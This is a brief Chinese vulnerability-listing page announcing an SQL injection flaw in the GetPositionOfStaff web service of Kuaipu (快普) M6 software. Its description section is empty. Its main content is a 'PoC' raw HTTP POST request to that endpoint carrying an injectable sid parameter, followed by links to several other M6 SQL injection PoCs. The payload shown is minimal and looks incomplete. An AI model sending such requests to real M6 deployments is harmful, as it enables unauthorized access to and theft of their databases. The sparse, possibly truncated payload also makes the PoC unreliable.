快普M6 GetPositionOfStaff存在SQL注入漏洞

漏洞描述

PoC代码

POST /WebService/StaffService.asmx/GetPositionOfStaff HTTP/1.1
Host: 
Content-Type: application/x-www-form-urlencoded

sid=-1/user

相关漏洞推荐

• POC 快普M6 /WebService/SeatManageService.asmx/GetCallInfo SQL 注入漏洞
• 快普M6 /WebService/wsAutoComplete.asmx/GetAccountTitleList SQL 注入漏洞
• 快普M6 GetAccountTitleList 存在SQL注入漏洞
• 快普M6 SalaryAccounting SQL注入漏洞
• POC 快普M6 MediaUpload处存在前台SQL注入漏洞